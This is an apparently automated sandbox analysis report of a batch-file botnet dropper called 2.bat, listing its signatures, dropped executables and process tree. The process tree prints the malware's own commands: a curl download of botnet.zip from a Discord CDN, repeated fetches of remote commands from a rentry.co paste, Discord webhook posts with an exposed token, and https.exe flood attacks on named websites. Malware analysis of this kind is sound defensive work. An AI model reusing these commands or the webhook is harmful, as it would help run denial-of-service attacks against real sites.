91d4f69edd266840e549e4470edb9c51289abf84c7f7e4ef22ce157c75932112

Analysis

max time kernel
1799s
max time network
1805s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
18-08-2023 13:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2.bat
Size

778B
MD5

a33d8f86256aa8f7a8cb7d42707ee267
SHA1

cda0d5614da462696a56f164cd091c01caa6b01b
SHA256

91d4f69edd266840e549e4470edb9c51289abf84c7f7e4ef22ce157c75932112
SHA512

e733a716b5e04fc97ca4c46b866b7ce21b9a9b27f7d2e6c7a4097b314a5f8bc883598f70026ff530a46b3f2d9439bc2154fc8d5ec746c0339e75b9c1c5ae3d85

Score

9^/10

discovery

Malware Config

Signatures

Contacts a large (7970) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Executes dropped EXE 11 IoCs

pid	Process
4496	forvmbox.exe
4268	https.exe
4280	https.exe
2504	https.exe
1380	https.exe
4060	https.exe
3432	https.exe
1620	https.exe
3896	https.exe
1292	https.exe
2516	https.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
1416	timeout.exe
3000	timeout.exe
3284	timeout.exe
4748	timeout.exe
532	timeout.exe
4060	timeout.exe
3964	timeout.exe
4204	timeout.exe
1156	timeout.exe
3056	timeout.exe
2520	timeout.exe
4920	timeout.exe
4116	timeout.exe
3816	timeout.exe
1136	timeout.exe
1416	timeout.exe
2924	timeout.exe
2920	timeout.exe
4252	timeout.exe
224	timeout.exe
936	timeout.exe
2396	timeout.exe
2636	timeout.exe
3916	timeout.exe
3000	timeout.exe
3156	timeout.exe
1180	timeout.exe
1940	timeout.exe
572	timeout.exe
1776	timeout.exe
2736	timeout.exe
2612	timeout.exe
3892	timeout.exe
3824	timeout.exe
3804	timeout.exe
4320	timeout.exe
3404	timeout.exe
2396	timeout.exe
2300	timeout.exe
1816	timeout.exe
3208	timeout.exe
2552	timeout.exe
1160	timeout.exe
2996	timeout.exe
3928	timeout.exe
3332	timeout.exe
1120	timeout.exe
4300	timeout.exe
4008	timeout.exe
1228	timeout.exe
1648	timeout.exe
3644	timeout.exe
1428	timeout.exe
1152	timeout.exe
3832	timeout.exe
4500	timeout.exe
404	timeout.exe
4436	timeout.exe
4896	timeout.exe
3948	timeout.exe
4992	timeout.exe
4960	timeout.exe
1328	timeout.exe
4240	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4184	powershell.exe
4184	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4184	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1252 wrote to memory of 4156	1252	cmd.exe	82
PID 1252 wrote to memory of 4156	1252	cmd.exe	82
PID 1252 wrote to memory of 4184	1252	cmd.exe	85
PID 1252 wrote to memory of 4184	1252	cmd.exe	85
PID 1252 wrote to memory of 4496	1252	cmd.exe	96
PID 1252 wrote to memory of 4496	1252	cmd.exe	96
PID 1252 wrote to memory of 4496	1252	cmd.exe	96
PID 1252 wrote to memory of 4604	1252	cmd.exe	97
PID 1252 wrote to memory of 4604	1252	cmd.exe	97
PID 4604 wrote to memory of 4572	4604	cmd.exe	98
PID 4604 wrote to memory of 4572	4604	cmd.exe	98
PID 4604 wrote to memory of 3924	4604	cmd.exe	99
PID 4604 wrote to memory of 3924	4604	cmd.exe	99
PID 1252 wrote to memory of 2620	1252	cmd.exe	101
PID 1252 wrote to memory of 2620	1252	cmd.exe	101
PID 4496 wrote to memory of 2756	4496	forvmbox.exe	102
PID 4496 wrote to memory of 2756	4496	forvmbox.exe	102
PID 2756 wrote to memory of 3228	2756	cmd.exe	103
PID 2756 wrote to memory of 3228	2756	cmd.exe	103
PID 2756 wrote to memory of 2800	2756	cmd.exe	104
PID 2756 wrote to memory of 2800	2756	cmd.exe	104
PID 2756 wrote to memory of 4268	2756	cmd.exe	105
PID 2756 wrote to memory of 4268	2756	cmd.exe	105
PID 2756 wrote to memory of 4884	2756	cmd.exe	107
PID 2756 wrote to memory of 4884	2756	cmd.exe	107
PID 2756 wrote to memory of 3208	2756	cmd.exe	108
PID 2756 wrote to memory of 3208	2756	cmd.exe	108
PID 2756 wrote to memory of 1816	2756	cmd.exe	109
PID 2756 wrote to memory of 1816	2756	cmd.exe	109
PID 2756 wrote to memory of 5100	2756	cmd.exe	110
PID 2756 wrote to memory of 5100	2756	cmd.exe	110
PID 2756 wrote to memory of 948	2756	cmd.exe	111
PID 2756 wrote to memory of 948	2756	cmd.exe	111
PID 2756 wrote to memory of 4060	2756	cmd.exe	112
PID 2756 wrote to memory of 4060	2756	cmd.exe	112
PID 2756 wrote to memory of 2068	2756	cmd.exe	113
PID 2756 wrote to memory of 2068	2756	cmd.exe	113
PID 2756 wrote to memory of 1676	2756	cmd.exe	114
PID 2756 wrote to memory of 1676	2756	cmd.exe	114
PID 2756 wrote to memory of 3508	2756	cmd.exe	115
PID 2756 wrote to memory of 3508	2756	cmd.exe	115
PID 2756 wrote to memory of 4332	2756	cmd.exe	116
PID 2756 wrote to memory of 4332	2756	cmd.exe	116
PID 2756 wrote to memory of 4860	2756	cmd.exe	117
PID 2756 wrote to memory of 4860	2756	cmd.exe	117
PID 2756 wrote to memory of 1120	2756	cmd.exe	118
PID 2756 wrote to memory of 1120	2756	cmd.exe	118
PID 2756 wrote to memory of 1556	2756	cmd.exe	119
PID 2756 wrote to memory of 1556	2756	cmd.exe	119
PID 2756 wrote to memory of 1156	2756	cmd.exe	120
PID 2756 wrote to memory of 1156	2756	cmd.exe	120
PID 2756 wrote to memory of 4280	2756	cmd.exe	121
PID 2756 wrote to memory of 4280	2756	cmd.exe	121
PID 2756 wrote to memory of 4908	2756	cmd.exe	122
PID 2756 wrote to memory of 4908	2756	cmd.exe	122
PID 2756 wrote to memory of 2552	2756	cmd.exe	123
PID 2756 wrote to memory of 2552	2756	cmd.exe	123
PID 2756 wrote to memory of 2880	2756	cmd.exe	124
PID 2756 wrote to memory of 2880	2756	cmd.exe	124
PID 2756 wrote to memory of 1816	2756	cmd.exe	125
PID 2756 wrote to memory of 1816	2756	cmd.exe	125
PID 2756 wrote to memory of 4144	2756	cmd.exe	126
PID 2756 wrote to memory of 4144	2756	cmd.exe	126
PID 2756 wrote to memory of 3660	2756	cmd.exe	127

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1252
- C:\Windows\system32\curl.exe
  curl -o botnet.zip https://cdn.discordapp.com/attachments/1134556559578517677/1141848588612276304/botney.zip
  2⤵
  PID:4156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Expand-Archive -Path 'botnet.zip' -DestinationPath 'C:\Users\Admin\Desktop'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4184
- C:\Users\Admin\Desktop\forvmbox.exe
  forvmbox.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4496
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A36F.tmp\A37F.tmp\A380.bat C:\Users\Admin\Desktop\forvmbox.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3228
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https https://www.jokey.com/ 36000 10 {}\", \"description\": \" Fri 08/18/2023-10 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:2800
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe https://www.jokey.com/ 10
      4⤵
      Executes dropped EXE
      PID:4268
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4884
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3208
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1816
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5100
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:948
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4060
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2068
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1676
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3508
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4332
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4860
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1120
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1556
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://ctptc-airinei.ro/ 36000 40 {}\", \"description\": \" Fri 08/18/2023-40 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:1156
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://ctptc-airinei.ro/ 40
      4⤵
      Executes dropped EXE
      PID:4280
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4908
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2552
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2880
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1816
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4144
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3660
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2228
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4196
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4080
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4008
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2752
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://ctptc-airinei.ro/catinfo/iacSimo/html/ 36000 50 {}\", \"description\": \" Fri 08/18/2023-50 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:3896
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://ctptc-airinei.ro/catinfo/iacSimo/html/ 50
      4⤵
      Executes dropped EXE
      PID:2504
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4280
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1428
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4420
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1940
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1936
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1152
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1952
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1160
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4236
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4472
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3860
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4588
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:948
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2060
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4492
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4008
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3816
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2904
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2124
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1772
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3624
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://ctptc-airinei.ro/ 5 5 {}\", \"description\": \" Fri 08/18/2023-5 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:3632
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://ctptc-airinei.ro/ 5
      4⤵
      Executes dropped EXE
      PID:1380
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3332
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2996
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4128
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1228
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4240
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3000
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3136
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:636
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4976
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1164
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:512
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4604
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2908
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4572
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2400
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3876
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2056
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4608
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4688
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4304
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4652
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4656
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2280
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1876
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1864
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1724
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:5088
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1352
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2928
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3900
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2292
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:680
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:460
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2692
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3644
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4808
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3540
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4284
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4452
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1292
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4704
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4048
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3228
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3156
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3908
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4372
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1632
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4044
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1252
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2612
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2552
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1152
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3588
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4288
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1040
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4116
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3868
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5100
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1928
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3404
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1932
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4176
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3832
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https https://boomcarservice.ro/ 36000 50 {}\", \"description\": \" Fri 08/18/2023-50 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:1784
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe https://boomcarservice.ro/ 50
      4⤵
      Executes dropped EXE
      PID:4060
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4224
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1448
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4608
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3892
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4748
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5108
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2156
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2140
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1984
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1744
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1116
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5088
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4660
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4500
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2032
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2588
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2296
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1012
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:412
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:572
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1896
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1416
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3172
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3348
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4416
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1080
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4272
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4704
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3508
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4852
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2328
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4960
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3908
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:728
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4436
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1428
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3928
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2612
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2552
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4676
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3588
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4288
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4620
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3960
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3660
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:932
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4588
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:100
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4176
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3832
